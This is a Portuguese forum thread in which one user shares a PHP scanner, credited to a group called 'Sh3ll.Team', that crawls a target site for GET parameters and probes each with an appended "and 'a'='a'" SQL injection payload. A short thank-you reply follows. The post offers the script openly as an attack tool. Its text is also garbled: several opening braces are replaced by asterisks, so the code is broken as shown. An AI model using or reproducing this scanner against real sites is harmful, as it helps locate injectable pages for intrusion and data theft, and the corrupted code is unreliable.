PHP sql injection

Baguio Loko

Membro Participativo

Registrado em: Jun 2011

Posts: 525
- Share
- Tweet
Font Size

#1

Dica PHP sql injection

16-09-2011, 18:07

Codigo em php para SQL injection

<?php

#Sh3ll.Team 2008-08-28
#Sql injection scanner by Pr0xY

$http = '';

if($http == '')
die("Http is empty!\n\nPowered by Pr0xY\n# Sh3ll.Team [2008-09-02]");

echo "Scan for : $http \n\n";

$http = (substr($http, -1) != '/') ? $http.'/' : $http;
$found = getGet();

function getGet()
**
global $http;

$getN = array();
$fenN = array();

$htm = @file_get_contents($http);
@preg_match_all('/((\/[a-zA-Z0-9]+\/)|)([a-zA-Z0-9]+\.[a-zA-Z0-9]+\?)([a-zA-Z0-9]+)(\s*\=)([a-zA-Z0-9]+)/im', $htm, $gets);

foreach($gets[0] as $get)
**
$get = str_replace($http, '', $get);

if(!in_array($get, $getN))
**
@preg_match_all('/(.*)(\?)/', $get, $gn);
$name = str_replace('?', '', $gn[1][0]);

if(!@in_array($name, $fenN) && @in_array(substr(strrchr($name, "."), 1), array('php', 'asp', 'aspx')))**
$getN[] = $get;
$fenN[] = $name;
}
}
}
return $getN;
}

foreach($found as $get)
**
$address = $http.$get;

$htm1 = @file_get_contents($address);
$htm2 = @file_get_contents($address.'%20and%20\'a\'%20=%20 \'a\'');

if($htm1 == $htm2)
echo $get." SQL injection! \n";
else
echo $get." Failed! \n";

}

echo "\n\nPowered by Pr0xY\n";

?>
Tags: Nenhum(a)

Top
10ANWO

Membro

Registrado em: Jan 2011

Posts: 129
- Share
- Tweet
Font Size

#2

16-09-2011, 19:42

-Obrigado por compartilhar

sigpic
"Porque na muita sabedoria há muito enfado; e o que aumenta em conhecimento, aumenta em dor."
Top
Comment

Unconfigured Ad Widget

Anúncio

Dica PHP sql injection

Comment